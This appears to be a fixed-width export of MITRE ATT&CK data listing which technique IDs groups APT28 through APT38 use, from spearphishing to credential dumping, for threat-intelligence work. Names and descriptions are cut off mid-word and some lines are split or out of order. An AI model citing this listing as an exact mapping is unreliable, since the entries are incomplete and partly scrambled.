G0007 APT28 intrusion- group uses T1110 Brute Forc attack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1070.001Clear Windattack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1078.004Cloud Accoattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1092 Communicaattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1546.015Componentattack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1589.001Credentialsattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1030 Data Transfattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1213 Data from attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1005 Data from attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1039 Data from attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1025 Data from attack-pat technique An [APT28](
G0007 APT28 intrusion- group uses T1140 Deobfuscatattack-pat technique An [APT28](
G0007 APT28 intrusion- group uses T1583.001Domains attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1189 Drive-by C attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1559.002Dynamic Daattack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1586.002Email Accoattack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1027.013Encrypted/attack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1557.004Evil Twin attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1048.002Exfiltrati attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1567 Exfiltratio attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1190 Exploit Pubattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1203 Exploitatioattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1211 Exploitatioattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1068 Exploitatioattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1210 Exploitatioattack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1090.002External Prattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1133 External R attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1070.004File Deleti attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1083 File and Di attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1564.001Hidden Fileattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1564.003Hidden Wi attack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1105 Ingress Tooattack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1001.001Junk Data attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1056.001Keyloggingattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1003.001LSASS Memattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1074.001Local Data attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1037.001Logon Scri attack-pat technique An [APT28]
G0007 APT28 intrusion- group uses T1071.003Mail Protocattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1204.002Malicious Fattack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1204.001Malicious Lattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1036 Masqueradattack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1036.005Match Legiattack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1090.003Multi-hop attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1003.003NTDS attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1498 Network Deattack-pat technique In 2016, [A
G0007 APT28 intrusion- group uses T1584.008Network Deattack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1040 Network Snattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1003 OS Credentattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1137.002Office Testattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1550.002Pass the H attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1110.001Password Gattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1110.003Password Sattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1120 Peripheral attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1598 Phishing foattack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1059.001PowerShellattack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1057 Process Di attack-pat technique An [APT28](
G0007 APT28 intrusion- group uses T1547.001Registry Ruattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1074.002Remote Datattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1114.002Remote Ema attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1091 Replicatio attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1014 Rootkit attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1218.011Rundll32 attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1021.002SMB/Windo attack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1113 Screen Capattack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1213.002Sharepointattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1566.001Spearphishattack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1598.003Spearphishattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1528 Steal Appliattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1573.001Symmetric attack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1221 Template Iattack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1070.006Timestompattack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1134.001Token Impeattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1588.002Tool attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1199 Trusted Relattack-pat technique Once [APT2
G0007 APT28 intrusion- group uses T1078 Valid Acco attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1583.003Virtual Pri attack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1595.002Vulnerabiliattack-pat technique [APT28](htt
G0007 APT28 intrusion- group uses T1071.001Web Protocattack-pat technique Later impla
G0007 APT28 intrusion- group uses T1583.006Web Servicattack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1505.003Web Shell attack-pat technique [APT28](ht
G0007 APT28 intrusion- group uses T1059.003Windows Cattack-pat technique An [APT28]
G0016 APT29 intrusion- group uses T1546.008Accessibili attack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1098.002Additional attack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1027.001Binary Padattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1037 Boot or Logattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1548.002Bypass Useattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1059.009Cloud API attack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1087.004Cloud Accoattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1136.003Cloud Accoattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1586.003Cloud Accoattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1078.004Cloud Accoattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1651 Cloud Admattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1021.007Cloud Servattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1005 Data from attack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1098.005Device Regiattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1587.003Digital Certattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1562.008Disable or attack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1090.004Domain Froattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1568 Dynamic Reattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1586.002Email Accoattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1573 Encrypted attack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1190 Exploit Pubattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1203 Exploitatioattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1068 Exploitatioattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1090.002External Prattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1133 External R attack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1070.004File Deleti attack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1027.006HTML Smugattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1665 Hide Infrasattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1556.007Hybrid Idenattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1105 Ingress Tooattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1016.001Internet C attack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1003.004LSA Secret attack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1078.003Local Acco attack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1204.002Malicious Fattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1204.001Malicious Lattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1587.001Malware attack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1553.005Mark-of-thattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1036.005Match Legiattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1218.005Mshta attack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1621 Multi-Fact attack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1090.003Multi-hop attack-pat technique A backdoor
G0016 APT29 intrusion- group uses T1550.003Pass the Tiattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1110.001Password Gattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1110.003Password Sattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1059.001PowerShellattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1059.006Python attack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1037.004RC Scripts attack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1547.001Registry Ruattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1114.002Remote Ema attack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1053.005Scheduled attack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1003.002Security A attack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1027.002Software Pattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1566.001Spearphishattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1566.002Spearphishattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1566.003Spearphishiattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1528 Steal Appliattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1649 Steal or Foattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1070.006Timestompattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1588.002Tool attack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1199 Trusted Relattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1078 Valid Acco attack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1595.002Vulnerabiliattack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1583.006Web Servicattack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1505.003Web Shell attack-pat technique [APT29](htt
G0016 APT29 intrusion- group uses T1047 Windows M attack-pat technique [APT29](ht
G0016 APT29 intrusion- group uses T1546.003Windows Ma attack-pat technique [APT29](ht
G0022 APT3 intrusion- group uses T1546.008Accessibili attack-pat technique [APT3](htt
G0022 APT3 intrusion- group uses T1098.007Additional attack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1560.001Archive viaattack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1552.001Credentialsattack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1555.003Credential attack-pat technique [APT3](htt
G0022 APT3 intrusion- group uses T1574.002DLL Side-L attack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1005 Data from attack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1078.002Domain Acattack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1041 Exfiltratio attack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1203 Exploitatioattack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1090.002External Prattack-pat technique An [APT3](h
G0022 APT3 intrusion- group uses T1070.004File Deleti attack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1083 File and Di attack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1564.003Hidden Wi attack-pat technique [APT3](htt
G0022 APT3 intrusion- group uses T1027.005Indicator attack-pat technique [APT3](htt
G0022 APT3 intrusion- group uses T1105 Ingress Tooattack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1056.001Keyloggingattack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1003.001LSASS Memattack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1087.001Local Acco attack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1136.001Local Acco attack-pat technique [APT3](htt
G0022 APT3 intrusion- group uses T1074.001Local Data attack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1204.001Malicious Lattack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1036.010Masqueradattack-pat technique [APT3](htt
G0022 APT3 intrusion- group uses T1104 Multi-Stag attack-pat technique An [APT3](h
G0022 APT3 intrusion- group uses T1095 Non-Applicattack-pat technique An [APT3](h
G0022 APT3 intrusion- group uses T1027 Obfuscatedattack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1110.002Password Cattack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1069 Permissionattack-pat technique [APT3](htt
G0022 APT3 intrusion- group uses T1059.001PowerShellattack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1057 Process Di attack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1547.001Registry Ruattack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1021.001Remote Des attack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1018 Remote Sysattack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1218.011Rundll32 attack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1021.002SMB/Windo attack-pat technique [APT3](htt
G0022 APT3 intrusion- group uses T1053.005Scheduled attack-pat technique An [APT3](
G0022 APT3 intrusion- group uses T1027.002Software Pattack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1566.002Spearphishattack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1082 System Inf attack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1016 System Netattack-pat technique A keyloggin
G0022 APT3 intrusion- group uses T1049 System Netattack-pat technique [APT3](http
G0022 APT3 intrusion- group uses T1033 System Own attack-pat technique An [APT3](
G0022 APT3 intrusion- group uses T1059.003Windows Cattack-pat technique An [APT3](
G0022 APT3 intrusion- group uses T1543.003Windows Se attack-pat technique [APT3](http
G0013 APT30 intrusion- group uses T1204.002Malicious Fattack-pat technique [APT30](htt
G0013 APT30 intrusion- group uses T1566.001Spearphishattack-pat technique [APT30](ht
G0050 APT32 intrusion- group uses T1560 Archive Coattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1027.001Binary Padattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1070.001Clear Windattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1027.010Command aOttack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1059 Command attack-pat
an technique [APT32](htt
G0050 APT32 intrusion- group uses T1552.002Credentialsattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1574.002DLL Side-L attack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1583.001Domains attack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1189 Drive-by C attack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1608.004Drive-by T attack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1589.002Email Addrattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1027.013Encrypted/attack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1041 Exfiltratio attack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1048.003Exfiltrati attack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1203 Exploitatioattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1068 Exploitatioattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1070.004File Deleti attack-pat technique [APT32](ht
[APT32](https://attack.mitre.
G0050 APT32 intrusion- group uses T1083 File and Di attack-pat technique
G0050 APT32 intrusion- group uses T1027.011Fileless St attack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1589 Gather Victattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1564.001Hidden Fileattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1564.003Hidden Wi attack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1105 Ingress Tooattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1059.007JavaScript attack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1056.001Keyloggingattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1003.001LSASS Memattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1570 Lateral Tooattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1222.002Linux and Mattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1087.001Local Acco attack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1078.003Local Acco attack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1071.003Mail Protocattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1204.002Malicious Fattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1204.001Malicious Lattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1036.004Masquerade attack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1036 Masqueradattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1036.005Match Legiattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1112 Modify Regattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1218.005Mshta attack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1564.004NTFS File Aattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1046 Network Seattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1135 Network Shattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1571 Non-Standaattack-pat technique An [APT32]
G0050 APT32 intrusion- group uses T1003 OS Credentattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1137 Office Applattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1550.002Pass the H attack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1550.003Pass the Tiattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1059.001PowerShellattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1055 Process Injattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1216.001PubPrn attack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1012 Query Regiattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1547.001Registry Ruattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1218.010Regsvr32 attack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1018 Remote Sysattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1036.003Rename Sys attack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1218.011Rundll32 attack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1021.002SMB/Windo attack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1053.005Scheduled attack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1569.002Service Ex attack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1585.001Social Medattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1072 Software Dattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1566.001Spearphishattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1566.002Spearphishattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1598.003Spearphishattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1082 System Inf attack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1016 System Netattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1049 System Netattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1033 System Own attack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1070.006Timestompattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1588.002Tool attack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1608.001Upload Maattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1059.005Visual Basiattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1071.001Web Protocattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1102 Web Servicattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1583.006Web Servicattack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1505.003Web Shell attack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1059.003Windows Cattack-pat technique [APT32](htt
G0050 APT32 intrusion- group uses T1047 Windows M attack-pat technique [APT32](ht
G0050 APT32 intrusion- group uses T1543.003Windows Se attack-pat technique [APT32](htt
[APT33](https://attack.mitre.
G0064 APT33 intrusion- group uses T1560.001Archive viaattack-pat technique
G0064 APT33 intrusion- group uses T1003.005Cached Dom attack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1078.004Cloud Accoattack-pat technique [APT33](ht
G0064 APT33 intrusion- group uses T1552.001Credentialsattack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1555 Credential attack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1555.003Credential attack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1027.013Encrypted/attack-pat technique [APT33](ht
G0064 APT33 intrusion- group uses T1048.003Exfiltrati attack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1203 Exploitatioattack-pat technique [APT33](ht
G0064 APT33 intrusion- group uses T1068 Exploitatioattack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1552.006Group Poliattack-pat technique [APT33](htt
[APT33](https://attack.mitre.
G0064 APT33 intrusion- group uses T1105 Ingress Tooattack-pat technique
G0064 APT33 intrusion- group uses T1003.004LSA Secret attack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1003.001LSASS Memattack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1204.002Malicious Fattack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1204.001Malicious Lattack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1040 Network Snattack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1571 Non-Standaattack-pat technique [APT33](ht
G0064 APT33 intrusion- group uses T1110.003Password Sattack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1059.001PowerShellattack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1547.001Registry Ruattack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1053.005Scheduled attack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1566.001Spearphishattack-pat technique [APT33](ht
G0064 APT33 intrusion- group uses T1566.002Spearphishattack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1132.001Standard Eattack-pat technique [APT33](ht
G0064 APT33 intrusion- group uses T1573.001Symmetric attack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1588.002Tool attack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1078 Valid Acco attack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1059.005Visual Basiattack-pat technique [APT33](htt
G0064 APT33 intrusion- group uses T1071.001Web Protocattack-pat technique [APT33](ht
G0064 APT33 intrusion- group uses T1546.003Windows Ma attack-pat technique [APT33](ht
G0067 APT37 intrusion- group uses T1123 Audio Captattack-pat technique [APT37](ht
G0067 APT37 intrusion- group uses T1102.002Bidirectio attack-pat technique [APT37](htt
G0067 APT37 intrusion- group uses T1548.002Bypass Useattack-pat technique [APT37](htt
G0067 APT37 intrusion- group uses T1059 Command attack-pat
an technique [APT37](htt
G0067 APT37 intrusion- group uses T1555.003Credential attack-pat technique [APT37](ht
G0067 APT37 intrusion- group uses T1005 Data from attack-pat technique [APT37](htt
G0067 APT37 intrusion- group uses T1561.002Disk Struc attack-pat technique [APT37](htt
G0067 APT37 intrusion- group uses T1189 Drive-by C attack-pat technique [APT37](htt
G0067 APT37 intrusion- group uses T1559.002Dynamic Daattack-pat technique [APT37](ht
G0067 APT37 intrusion- group uses T1203 Exploitatioattack-pat technique [APT37](ht
G0067 APT37 intrusion- group uses T1105 Ingress Tooattack-pat technique [APT37](ht
G0067 APT37 intrusion- group uses T1036.001Invalid Codattack-pat technique [APT37](htt
G0067 APT37 intrusion- group uses T1204.002Malicious Fattack-pat technique [APT37](ht
G0067 APT37 intrusion- group uses T1106 Native API attack-pat technique [APT37](htt
G0067 APT37 intrusion- group uses T1027 Obfuscatedattack-pat technique [APT37](htt
G0067 APT37 intrusion- group uses T1120 Peripheral attack-pat technique [APT37](htt
G0067 APT37 intrusion- group uses T1057 Process Di attack-pat technique [APT37](htt
G0067 APT37 intrusion- group uses T1055 Process Injattack-pat technique [APT37](htt
G0067 APT37 intrusion- group uses T1059.006Python attack-pat technique [APT37](htt
G0067 APT37 intrusion- group uses T1547.001Registry Ruattack-pat technique [APT37](ht
G0067 APT37 intrusion- group uses T1053.005Scheduled attack-pat technique [APT37](htt
G0067 APT37 intrusion- group uses T1566.001Spearphishattack-pat technique [APT37](htt
G0067 APT37 intrusion- group uses T1027.003Steganogr attack-pat technique [APT37](htt
G0067 APT37 intrusion- group uses T1082 System Inf attack-pat technique [APT37](ht
G0067 APT37 intrusion- group uses T1033 System Own attack-pat technique [APT37](htt
G0067 APT37 intrusion- group uses T1529 System Sh attack-pat technique [APT37](ht
G0067 APT37 intrusion- group uses T1059.005Visual Basiattack-pat technique [APT37](htt
G0067 APT37 intrusion- group uses T1071.001Web Protocattack-pat technique [APT37](ht
G0067 APT37 intrusion- group uses T1059.003Windows Cattack-pat technique [APT37](ht
G0082 APT38 intrusion- group uses T1217 Browser Inattack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1110 Brute Forc attack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1070.001Clear Windattack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1115 Clipboard attack-pat technique [APT38](htt
G0082 APT38 intrusion- group uses T1218.001Compiled Hattack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1053.003Cron attack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1485 Data Destrattack-pat technique [APT38](htt
G0082 APT38 intrusion- group uses T1486 Data Encryattack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1005 Data from attack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1562.004Disable or attack-pat technique [APT38](htt
G0082 APT38 intrusion- group uses T1561.002Disk Struc attack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1189 Drive-by C attack-pat technique [APT38](htt
G0082 APT38 intrusion- group uses T1070.004File Deleti attack-pat technique [APT38](htt
G0082 APT38 intrusion- group uses T1083 File and Di attack-pat technique [APT38](htt
G0082 APT38 intrusion- group uses T1562.003Impair Comattack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1105 Ingress Tooattack-pat technique [APT38](htt
G0082 APT38 intrusion- group uses T1056.001Keyloggingattack-pat technique [APT38](htt
G0082 APT38 intrusion- group uses T1204.002Malicious Fattack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1112 Modify Regattack-pat technique [APT38](htt
G0082 APT38 intrusion- group uses T1106 Native API attack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1135 Network Shattack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1059.001PowerShellattack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1057 Process Di attack-pat technique [APT38](htt
G0082 APT38 intrusion- group uses T1218.011Rundll32 attack-pat technique [APT38](htt
G0082 APT38 intrusion- group uses T1565.003Runtime Daattack-pat technique [APT38](htt
G0082 APT38 intrusion- group uses T1053.005Scheduled attack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1518.001Security S attack-pat technique [APT38](htt
G0082 APT38 intrusion- group uses T1569.002Service Ex attack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1027.002Software Pattack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1566.001Spearphishattack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1565.001Stored Datattack-pat technique [APT38](htt
G0082 APT38 intrusion- group uses T1082 System Inf attack-pat technique [APT38](htt
G0082 APT38 intrusion- group uses T1049 System Netattack-pat technique [APT38](htt
G0082 APT38 intrusion- group uses T1033 System Own attack-pat technique [APT38](htt
G0082 APT38 intrusion- group uses T1529 System Sh attack-pat technique [APT38](ht
